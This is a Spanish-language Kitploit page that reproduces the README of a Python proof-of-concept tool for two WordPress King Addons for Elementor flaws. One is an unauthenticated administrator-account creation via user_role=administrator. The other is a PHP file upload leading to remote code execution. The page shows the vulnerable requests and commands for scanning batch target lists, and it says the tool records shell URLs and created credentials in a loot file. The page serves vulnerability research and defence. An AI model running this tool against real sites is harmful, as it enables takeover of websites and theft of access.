Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-6325_CVE-2025-6327 — PoC en Python que valida la escalada de privilegios no autenticada CVE-2025-6325 y la RCE por carga arbitraria de archivos CVE-2025-6327 en King Addons for Elementor <= 51.1.36. | Kitploit
Herramientas/GitHubGitHub/johenlastgen-jlg/cve-2025-6325_cve-2025-6327
Escalada de PrivilegiosEscáneres de VulnerabilidadesAnálisis de VulnerabilidadesExplotaciónExplotación de Aplicaciones WebSeguridad WebPruebas de PenetraciónRed TeamingCrawler

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
Desarrollo de Payloads
GitHubjohenlastgen-jlg/cve-2025-6325_cve-2025-6327

CVE-2025-6325_CVE-2025-6327

PoC en Python que valida la escalada de privilegios no autenticada CVE-2025-6325 y la RCE por carga arbitraria de archivos CVE-2025-6327 en King Addons for Elementor <= 51.1.36.

Ver Repositorio
hace 7h 57mAún no revisado

CVE-2025-6325 + CVE-2025-6327

King Addons for Elementor — PoC de Explotación Dual

Herramienta de investigación y validación para King Addons for Elementor <= 51.1.36, que cubre dos vulnerabilidades documentadas:

  • CVE-2025-6325 — Escalada de Privilegios No Autenticada
  • CVE-2025-6327 — Carga Arbitraria de Archivos No Autenticada que conduce a RCE

Solo para pruebas de seguridad autorizadas, investigación de vulnerabilidades y entornos de laboratorio controlados.


Descripción General

Este proyecto proporciona un PoC de doble propósito para validar el impacto de seguridad de dos vulnerabilidades en King Addons for Elementor.

CVE-2025-6325

Escalada de privilegios no autenticada a través de la funcionalidad de registro de King Addons.

El flujo vulnerable acepta un valor user_role controlado por el cliente y lo pasa a la creación de usuarios de WordPress sin aplicar una lista de roles permitidos adecuada.

Versión afectada: <= 51.1.36 Versión parcheada: 51.1.37

El flujo de registro vulnerable utiliza:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_user_register
user_role=administrator

El PoC también verifica si la cuenta creada puede autenticarse y acceder a la página de administración de usuarios de WordPress.

CVE-2025-6327

Carga arbitraria de archivos no autenticada a través de la funcionalidad de carga del constructor de formularios de King Addons.

El manejador de carga vulnerable puede aceptar incorrectamente un archivo PHP, lo que resulta en un archivo cargado accesible desde la web y una posible ejecución de código del lado del servidor.

Versión afectada: <= 51.1.36 Versión parcheada: 51.1.37

La acción AJAX relevante es:

root@kitploit:~
POST /wp-admin/admin-ajax.php
action=king_addons_upload_file

El PoC valida el flujo de carga y comprueba si el archivo de prueba cargado puede ejecutar un comando id benigno.


Características

  • Validación de doble vulnerabilidad
  • Validación de escalada de privilegios CVE-2025-6325
  • Validación de carga/RCE CVE-2025-6327
  • Modo de descubrimiento pasivo de nonces
  • Pruebas de objetivo único
  • Soporte para listas de objetivos por lotes
  • Ejecución multihilo
  • Rastreo automático de páginas
  • Descubrimiento de sitemap
  • Profundidad de rastreo configurable
  • Máximo de páginas configurable
  • Tiempo de espera HTTP configurable
  • Salida de resultados en TSV
  • Salida de validación exitosa / loot
  • Salida de terminal sin color opcional
  • Solo biblioteca estándar de Python

El script admite cuatro modos de operación:

root@kitploit:~
check
privesc
upload
both

Estos modos se exponen directamente mediante la interfaz de línea de comandos.


Requisitos

Se requiere Python 3.

No se requieren paquetes de Python de terceros.

Comprueba tu versión de Python:

root@kitploit:~
python3 --version

Uso

Objetivo Único

Ejecutar ambas comprobaciones de vulnerabilidad:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit both

Comprobación Pasiva

Descubrir nonces de King Addons expuestos sin ejecutar las etapas de explotación:

root@kitploit:~
python3 exploit.py -u http://target.local --exploit check

Validación de Escalada de Privilegios

root@kitploit:~
python3 exploit.py -u http://target.local --exploit privesc

Validación de Carga/RCE

root@kitploit:~
python3 exploit.py -u http://target.local --exploit upload

Objetivos por Lotes

Crear un archivo de objetivos:

root@kitploit:~
http://target1.local
https://target2.local
http://target3.local

Los comentarios y las líneas vacías se ignoran.

Ejecutar una evaluación pasiva:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit check

Ejecutar ambas etapas de validación:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit both -t 20

Ejecutar la validación de carga:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit upload -t 20

Ejecutar la validación de escalada de privilegios:

root@kitploit:~
python3 exploit.py -l targets.txt --exploit privesc -t 20

Opciones del Rastreador

El PoC busca automáticamente en las páginas objetivo los nonces requeridos por los dos flujos vulnerables.

Configuración predeterminada del rastreador:

root@kitploit:~
Depth      : 3
Max pages  : 80
Timeout    : 20 seconds
Threads    : 10

Estos valores predeterminados se definen en la configuración CLI del script.

Ejemplo:

root@kitploit:~
python3 exploit.py \
  -l targets.txt \
  --exploit both \
  -t 20 \
  --depth 3 \
  --max-pages 80 \
  --timeout 20

Opciones de Línea de Comandos

El script utiliza por defecto results.tsv para resultados estructurados y loot.txt para entradas de validación exitosa.


Salida

Durante la ejecución, la herramienta informa varios estados.

SHELL

Indica que la validación de carga tuvo éxito y que el archivo PHP de prueba respondió a la solicitud de verificación.

Ejemplo:

root@kitploit:~
PWNED [SHELL]

PRIV

Indica que la validación de escalada de privilegios creó una cuenta utilizando el flujo de registro vulnerable.

La herramienta además registra si la cuenta fue verificada contra la página de administración de usuarios de WordPress.

VERIFIED

La cuenta creada se autenticó correctamente y se confirmó en la página de usuarios de WordPress.

UNVERIFIED

La solicitud de registro tuvo éxito, pero el paso de verificación posterior no pudo confirmar la cuenta resultante.

CLEAN

No se obtuvo ningún resultado de validación exitoso.

ERR

El objetivo produjo un error de red, análisis, rastreo u otro error de ejecución.


Resultados

Los resultados estructurados se escriben como TSV:

root@kitploit:~
results.tsv

La salida contiene campos para:

root@kitploit:~
target
status
shell_url
shell_rce
priv_user
priv_pwd
priv_verified
err

Este formato es útil para importar resultados en hojas de cálculo o para su posterior procesamiento.

Las entradas de validación exitosa se escriben además en:

root@kitploit:~
loot.txt

El script escribe los resultados de shell y de validación de privilegios como entradas separadas.


Flujo de Vulnerabilidad

CVE-2025-6325

root@kitploit:~
Visitor
   │
   ▼
Public King Addons Register Form
   │
   ▼
Nonce discovery
   │
   ▼
king_addons_user_register
   │
   ▼
Client-controlled user_role
   │
   ▼
WordPress user creation
   │
   ▼
Privilege escalation validation

El PoC envía específicamente:

root@kitploit:~
user_role=administrator

al endpoint de registro.

CVE-2025-6327

root@kitploit:~
Visitor
   │
   ▼
King Addons Form Builder
   │
   ▼
Upload nonce discovery
   │
   ▼
king_addons_upload_file
   │
   ▼
PHP test file upload
   │
   ▼
Uploaded file URL
   │
   ▼
Benign execution verification

El PoC utiliza un nombre de archivo de prueba generado de forma única y comprueba la URL de carga devuelta.


Verificación en Laboratorio

La implementación de la investigación se probó contra:

root@kitploit:~
WordPress 6.8 / 7.1
Elementor 4.2.3
King Addons 51.1.14

Las notas de investigación informan de la validación exitosa de ambos flujos en un entorno de laboratorio controlado, incluida la escalada de privilegios y la ejecución de shell. También se probó un control negativo contra la versión 51.1.37.


Nota Importante sobre Versiones

Las notas de investigación indican que algunas versiones ZIP de WordPress.org para 51.1.35 y 51.1.36 fueron reetiquetadas posteriormente con correcciones parciales.

Por lo tanto, la implementación vulnerable se confirmó utilizando la etiqueta SVN referenciada 51.1.14.

Si se reproduce la investigación, utilice la versión de laboratorio y el paquete exactos identificados por la investigación en lugar de asumir que cada paquete etiquetado como 51.1.35 o 51.1.36 contiene código vulnerable idéntico.


Uso Responsable

Este proyecto está destinado a:

  • Pruebas de penetración autorizadas
  • Investigación de vulnerabilidades
  • Validación de seguridad
  • Entornos CTF
  • Laboratorios de pruebas locales
  • Investigación de seguridad defensiva

Pruebe únicamente sistemas para los que tenga autorización explícita.

No utilice este proyecto contra infraestructuras de terceros sin permiso.

El autor no fomenta el acceso no autorizado, la persistencia, el robo de datos ni la interrupción de sistemas.


Descargo de Responsabilidad

Este software se proporciona con fines de investigación de seguridad y pruebas autorizadas.

Usted es responsable de garantizar que su uso de este proyecto cumpla con las leyes, regulaciones, contratos y requisitos de autorización aplicables.

El autor y los colaboradores no asumen ninguna responsabilidad por el uso indebido, daños, interrupción del servicio, pérdida de datos u otras consecuencias derivadas del uso no autorizado.


Autor

JohenLastGen — JLG NETWORK

Investigación y Herramientas de Seguridad

Telegram:

@johenlastgen

Canal:

@jlgnetworkredirect


Licencia

Licencia MIT

Consulte LICENSE para el texto completo de la licencia.

Descargar herramienta
OpciónDescripción
-u, --urlProbar una única URL objetivo
-l, --listArchivo que contiene URLs objetivo
-e, --exploitSeleccionar check, privesc, upload o both
-t, --threadsNúmero de trabajadores concurrentes
--depthProfundidad máxima de enlaces del rastreador
--max-pagesMáximo de páginas rastreadas por objetivo
--timeoutTiempo de espera de la solicitud HTTP en segundos
-o, --outputSalida de resultados en TSV
--lootSalida de validación exitosa
--no-colorDeshabilitar colores del terminal